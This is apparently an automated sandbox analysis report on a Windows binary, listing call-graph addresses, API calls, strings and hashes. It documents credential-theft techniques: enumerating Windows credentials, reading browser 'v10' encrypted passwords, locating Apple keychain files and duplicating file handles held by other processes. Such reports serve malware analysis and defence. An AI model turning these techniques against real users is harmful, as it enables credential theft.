409cea 39232->40070 39237 
414c94 39233->39237 39236 414c64 39236->38853 40073 414592 RegOpenKeyExW 39237->40073 39239 414cc1 39240 414cf4 wcscpy 39239->39240 40074 414bb0 wcscpy 39239->40074 39240->39236 39242 414cd2 40075 4145ac RegQueryValueExW 39242->40075 39244 414ce9 RegCloseKey 39244->39240 39246 409d43 wcscpy 39245->39246 39248 409d62 39245->39248 39247 409719 2 API calls 39246->39247 39249 409d51 wcscat 39247->39249 39248->38892 39249->39248 39251 40aebe FindClose 39250->39251 39252 40ae21 39251->39252 39253 4099c6 2 API calls 39252->39253 39254 40ae35 39253->39254 39255 409d1f 6 API calls 39254->39255 39256 40ae49 39255->39256 39256->38958 39258 40ade0 39257->39258 39259 40ae0f 39257->39259 39258->39259 39260 40ade7 wcscmp 39258->39260 39259->38958 39260->39259 39261 40adfe wcscmp 39260->39261 39261->39259 39263 40ae18 9 API calls 39262->39263 39269 4453c4 39263->39269 39264 40ae51 9 API calls 39264->39269 39265 4453f3 39266 40aebe FindClose 39265->39266 39268 4453fe 39266->39268 39267 40add4 2 API calls 39267->39269 39268->38958 39269->39264 39269->39265 39269->39267 39270 445403 253 API calls 39269->39270 39270->39269 39272 40ae7b FindNextFileW 39271->39272 39273 40ae5c FindFirstFileW 39271->39273 39274 40ae8f 39272->39274 39275 40ae94 39272->39275 39273->39275 39276 40aebe FindClose 39274->39276 39277 40aeb6 39275->39277 39278 409d1f 6 API calls 39275->39278 39276->39275 39277->38958 39278->39277 39281->38915 39282->38899 39283->38899 39284->38930 39286 409c89 39285->39286 39286->38954 39289 413d39 39288->39289 39290 413d2f FreeLibrary 39288->39290 39291 40b633 free 39289->39291 39290->39289 39292 413d42 39291->39292 39293 40b633 free 39292->39293 39294 413d4a 39293->39294 39294->38946 39295->38810 39296->38811 39297->38884 39299 44db70 39298->39299 39300 40b6fc memset 39299->39300 39301 409c70 2 API calls 39300->39301 39302 40b732 wcsrchr 39301->39302 39303 40b743 39302->39303 39304 40b746 memset 39302->39304 39303->39304 39305 40b2cc 27 API calls 39304->39305 39306 40b76f 
39305->39306 39307 409d1f 6 API calls 39306->39307 39308 40b783 39307->39308 40076 409b98 GetFileAttributesW 39308->40076 39310 40b792 39311 409c70 2 API calls 39310->39311 39325 40b7c2 39310->39325 39313 40b7a5 39311->39313 39315 40b2cc 27 API calls 39313->39315 39319 40b7b2 39315->39319 39316 40b837 CloseHandle 39318 40b83e memset 39316->39318 39317 40b817 40111 409a45 GetTempPathW 39317->40111 40110 40a6e6 WideCharToMultiByte 39318->40110 39323 409d1f 6 API calls 39319->39323 39321 40b827 CopyFileW 39321->39318 39323->39325 39324 40b866 39326 444432 121 API calls 39324->39326 40077 40bb98 39325->40077 39327 40b879 39326->39327 39328 40bad5 39327->39328 39329 40b273 27 API calls 39327->39329 39330 40baeb 39328->39330 39331 40bade DeleteFileW 39328->39331 39332 40b89a 39329->39332 39333 40b04b ??3@YAXPAX 39330->39333 39331->39330 39334 438552 134 API calls 39332->39334 39335 40baf3 39333->39335 39336 40b8a4 39334->39336 39335->38813 39337 40bacd 39336->39337 39339 4251c4 137 API calls 39336->39339 39338 443d90 111 API calls 39337->39338 39338->39328 39362 40b8b8 39339->39362 39340 40bac6 40123 424f26 123 API calls 39340->40123 39341 40b8bd memset 40114 425413 17 API calls 39341->40114 39344 425413 17 API calls 39344->39362 39347 40a71b MultiByteToWideChar 39347->39362 39348 40a734 MultiByteToWideChar 39348->39362 39351 40b9b5 memcmp 39351->39362 39352 4099c6 2 API calls 39352->39362 39353 404423 37 API calls 39353->39362 39356 40bb3e memset memcpy 40124 40a734 MultiByteToWideChar 39356->40124 39357 4251c4 137 API calls 39357->39362 39359 40bb88 LocalFree 39359->39362 39362->39340 39362->39341 39362->39344 39362->39347 39362->39348 39362->39351 39362->39352 39362->39353 39362->39356 39362->39357 39363 40ba5f memcmp 39362->39363 40115 4253ef 16 API calls 39362->40115 40116 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 39362->40116 40117 4253af 17 API calls 39362->40117 40118 4253cf 17 API calls 39362->40118 40119 447280 memset 39362->40119 40120 447960 memset 
memcpy memcpy memcpy 39362->40120 40121 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 39362->40121 40122 447920 memcpy memcpy memcpy 39362->40122 39363->39362 39364->38888 39366 40aed1 39365->39366 39367 40aec7 FindClose 39365->39367 39366->38823 39367->39366 39369 4099d7 39368->39369 39370 4099da memcpy 39368->39370 39369->39370 39370->38871 39372 40b2cc 27 API calls 39371->39372 39373 44543f 39372->39373 39374 409d1f 6 API calls 39373->39374 39375 44544f 39374->39375 40213 409b98 GetFileAttributesW 39375->40213 39377 445476 39380 40b2cc 27 API calls 39377->39380 39378 44545e 39378->39377 39379 40b6ef 252 API calls 39378->39379 39379->39377 39381 445482 39380->39381 39382 409d1f 6 API calls 39381->39382 39383 445492 39382->39383 40214 409b98 GetFileAttributesW 39383->40214 39385 4454a1 39386 4454b9 39385->39386 39387 40b6ef 252 API calls 39385->39387 39386->38897 39387->39386 39388->38896 39389->38920 39390->38926 39391->38961 39392->38942 39393->38986 39394->38986 39395->38972 39396->39002 39397->39004 39398->39006 39400 414c2e 16 API calls 39399->39400 39401 40c2ae 39400->39401 39471 40c1d3 39401->39471 39406 40c3be 39423 40a8ab 39406->39423 39407 40afcf 2 API calls 39408 40c2fd FindFirstUrlCacheEntryW 39407->39408 39409 40c3b6 39408->39409 39410 40c31e wcschr 39408->39410 39411 40b04b ??3@YAXPAX 39409->39411 39412 40c331 39410->39412 39413 40c35e FindNextUrlCacheEntryW 39410->39413 39411->39406 39414 40a8ab 9 API calls 39412->39414 39413->39410 39415 40c373 GetLastError 39413->39415 39418 40c33e wcschr 39414->39418 39416 40c3ad FindCloseUrlCache 39415->39416 39417 40c37e 39415->39417 39416->39409 39419 40afcf 2 API calls 39417->39419 39418->39413 39420 40c34f 39418->39420 39421 40c391 FindNextUrlCacheEntryW 39419->39421 39422 40a8ab 9 API calls 39420->39422 39421->39410 39421->39416 39422->39413 39587 40a97a 39423->39587 39426 40a8cc 39426->39013 39593 40b1ab free free 39428->39593 39430 40c3dd 39431 40b2cc 27 API calls 39430->39431 39432 40c3e7 39431->39432 39594 414592 
RegOpenKeyExW 39432->39594 39434 40c3f4 39435 40c50e 39434->39435 39436 40c3ff 39434->39436 39450 405337 39435->39450 39437 40a9ce 4 API calls 39436->39437 39438 40c418 memset 39437->39438 39595 40aa1d 39438->39595 39441 40c471 39443 40c47a _wcsupr 39441->39443 39442 40c505 RegCloseKey 39442->39435 39597 40a8d0 7 API calls 39443->39597 39445 40c498 39598 40a8d0 7 API calls 39445->39598 39447 40c4ac memset 39448 40aa1d 39447->39448 39449 40c4e4 RegEnumValueW 39448->39449 39449->39442 39449->39443 39599 405220 39450->39599 39454 4099c6 2 API calls 39453->39454 39455 40a714 _wcslwr 39454->39455 39456 40c634 39455->39456 39656 405361 39456->39656 39459 40c65c wcslen 39659 4053b6 39 API calls 39459->39659 39460 40c71d wcslen 39460->39027 39462 40c677 39470->39020 39472 40ae18 9 API calls 39471->39472 39478 40c210 39472->39478 39473 40ae51 9 API calls 39473->39478 39474 40c264 39475 40aebe FindClose 39474->39475 39477 40c26f 39475->39477 39476 40add4 2 API calls 39476->39478 39483 40e5ed memset memset 39477->39483 39478->39473 39478->39474 39478->39476 39479 40c231 _wcsicmp 39478->39479 39480 40c1d3 35 API calls 39478->39480 39479->39478 39481 40c248 39479->39481 39480->39478 39496 40c084 22 API calls 39481->39496 39484 414c2e 16 API calls 39483->39484 39485 40e63f 39484->39485 39486 409d1f 6 API calls 39485->39486 39487 40e658 39486->39487 39497 409b98 GetFileAttributesW 39487->39497 39489 40e667 39490 40e680 39489->39490 39491 409d1f 6 API calls 39489->39491 39498 409b98 GetFileAttributesW 39490->39498 39491->39490 39493 40e68f 39495 40c2d8 39493->39495 39499 40e4b2 39493->39499 39495->39406 39495->39407 39496->39478 39497->39489 39498->39493 39520 40e01e 39499->39520 39501 40e593 39502 40e5b0 39501->39502 39503 40e59c DeleteFileW 39501->39503 39505 40b04b ??3@YAXPAX 39502->39505 39503->39502 39504 40e521 39504->39501 39543 40e175 39504->39543 39506 40e5bb 39505->39506 39508 40e5c4 CloseHandle 39506->39508 39509 40e5cc 39506->39509 39508->39509 39511 40b633 free 
39509->39511 39510 40e573 39513 40e584 39510->39513 39514 40e57c CloseHandle 39510->39514 39512 40e5db 39511->39512 39516 40b633 free 39512->39516 39586 40b1ab free free 39513->39586 39514->39513 39515 40e540 39515->39510 39563 40e2ab 39515->39563 39518 40e5e3 39516->39518 39518->39495 39521 406214 22 API calls 39520->39521 39522 40e03c 39521->39522 39523 40e16b 39522->39523 39524 40dd85 74 API calls 39522->39524 39523->39504 39525 40e06b 39524->39525 39525->39523 39526 40afcf ??2@YAPAXI ??3@YAXPAX 39525->39526 39527 40e08d OpenProcess 39526->39527 39528 40e0a4 GetCurrentProcess DuplicateHandle 39527->39528 39532 40e152 39527->39532 39529 40e0d0 GetFileSize 39528->39529 39530 40e14a CloseHandle 39528->39530 39533 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39529->39533 39530->39532 39531 40e160 39535 40b04b ??3@YAXPAX 39531->39535 39532->39531 39534 406214 22 API calls 39532->39534 39536 40e0ea 39533->39536 39534->39531 39535->39523 39537 4096dc CreateFileW 39536->39537 39538 40e0f1 CreateFileMappingW 39537->39538 39539 40e140 CloseHandle CloseHandle 39538->39539 39540 40e10b MapViewOfFile 39538->39540 39539->39530 39541 40e13b CloseHandle 39540->39541 39542 40e11f WriteFile UnmapViewOfFile 39540->39542 39541->39539 39542->39541 39544 40e18c 39543->39544 39545 406b90 11 API calls 39544->39545 39546 40e19f 39545->39546 39547 40e1a7 memset 39546->39547 39548 40e299 39546->39548 39553 40e1e8 39547->39553 39549 4069a3 ??3@YAXPAX free 39548->39549 39550 40e2a4 39549->39550 39550->39515 39551 406e8f 13 API calls 39551->39553 39552 406b53 SetFilePointerEx ReadFile 39552->39553 39553->39551 39553->39552 39554 40e283 39553->39554 39555 40dd50 _wcsicmp 39553->39555 39559 40742e 8 API calls 39553->39559 39560 40aae3 wcslen wcslen _memicmp 39553->39560 39561 40e244 _snwprintf 39553->39561 39556 40e291 39554->39556 39557 40e288 free 39554->39557 39555->39553 39558 40aa04 free 39556->39558 39557->39556 39558->39548 39559->39553 39560->39553 39562 40a8d0 7 API calls 
39561->39562 39562->39553 39564 40e2c2 39563->39564 39565 406b90 11 API calls 39564->39565 39585 40e2d3 39565->39585 39566 40e4a0 39567 4069a3 ??3@YAXPAX free 39566->39567 39569 40e4ab 39567->39569 39568 406e8f 13 API calls 39568->39585 39569->39515 39570 406b53 SetFilePointerEx ReadFile 39570->39585 39571 40e489 39572 40aa04 free 39571->39572 39573 40e491 39572->39573 39573->39566 39574 40e497 free 39573->39574 39574->39566 39575 40dd50 _wcsicmp 39575->39585 39576 40dd50 _wcsicmp 39577 40e376 memset 39576->39577 39578 40aa29 6 API calls 39577->39578 39578->39585 39579 40742e 8 API calls 39579->39585 39580 40e3e0 memcpy 39580->39585 39581 40e3b3 wcschr 39581->39585 39582 40e3fb memcpy 39582->39585 39583 40e416 memcpy 39583->39585 39584 40e431 memcpy 39584->39585 39585->39566 39585->39568 39585->39570 39585->39571 39585->39575 39585->39576 39585->39579 39585->39580 39585->39581 39585->39582 39585->39583 39585->39584 39586->39501 39589 40a980 39587->39589 39588 40a8bb 39588->39426 39592 40a8d0 7 API calls 39588->39592 39589->39588 39590 40a995 _wcsicmp 39589->39590 39591 40a99c wcscmp 39589->39591 39590->39589 39591->39589 39592->39426 39593->39430 39594->39434 39596 40aa23 RegEnumValueW 39595->39596 39596->39441 39596->39442 39597->39445 39598->39447 39600 405335 39599->39600 39601 40522a 39599->39601 39600->39027 39602 40b2cc 27 API calls 39601->39602 39603 405234 39602->39603 39604 40a804 8 API calls 39603->39604 39605 40523a 39604->39605 39644 40b273 39605->39644 39607 405248 _mbscpy _mbscat GetProcAddress 39608 40b273 27 API calls 39607->39608 39609 405279 39608->39609 39647 405211 GetProcAddress 39609->39647 39645 40b58d 27 API calls 39644->39645 39646 40b18c 39645->39646 39646->39607 39657 405220 39 API calls 39656->39657 39658 405369 39657->39658 39658->39459 39658->39460 39659->39462 39664 40440c FreeLibrary 39663->39664 39665 40436d 39664->39665 39666 40a804 8 API calls 39665->39666 39667 404377 39666->39667 39668 404383 39667->39668 39669 404405 

Control-flow Graph
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509
• Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
• Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
• Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
APIs
  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
  • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
• GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
• free.MSVCRT ref: 00418803
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
• String ID:
• API String ID: 1355100292-0
• Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
• Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
• Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
APIs
• FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
• FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: FileFind$FirstNext
• String ID:
• API String ID: 1690352074-0
• Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
• Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
• Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
APIs
• memset.MSVCRT ref: 0041898C
• GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: InfoSystemmemset
• String ID:
• API String ID: 3558857096-0
• Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
• Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
• Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

Control-flow Graph
APIs
• memset.MSVCRT ref: 004455C2
• wcsrchr.MSVCRT ref: 004455DA
• memset.MSVCRT ref: 0044570D
• memset.MSVCRT ref: 00445725
  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
  • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
  • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
  • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
• memset.MSVCRT ref: 0044573D
• memset.MSVCRT ref: 00445755
• memset.MSVCRT ref: 004458CB
• memset.MSVCRT ref: 004458E3
• memset.MSVCRT ref: 0044596E
• memset.MSVCRT ref: 00445A10
• memset.MSVCRT ref: 00445A28
• memset.MSVCRT ref: 00445AC6
  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
• memset.MSVCRT ref: 00445B52
• memset.MSVCRT ref: 00445B6A
• memset.MSVCRT ref: 00445C9B
• memset.MSVCRT ref: 00445CB3
• _wcsicmp.MSVCRT ref: 00445D56
• memset.MSVCRT ref: 00445B82
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
• memset.MSVCRT ref: 00445986
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                • API String ID: 2263259095-3798722523
                                                                                                                                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                                                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                                                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                                                                • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                                                                • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                                                                Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040B71C
                                                                                                                                                  • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                                                                  • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                                                                • wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                • memset.MSVCRT ref: 0040B756
                                                                                                                                                • memset.MSVCRT ref: 0040B7F5
                                                                                                                                                • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                                                                • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                                                                • memset.MSVCRT ref: 0040B851
                                                                                                                                                • memset.MSVCRT ref: 0040B8CA
                                                                                                                                                • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                                                                  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                                                                • memset.MSVCRT ref: 0040BB53
                                                                                                                                                • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                                                                • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                                                                • String ID: chp$v10
                                                                                                                                                • API String ID: 4165125987-2783969131
                                                                                                                                                • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                                                                • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                                                                • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                                                                 Control-flow Graph

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                • free.MSVCRT ref: 0040E49A
                                                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
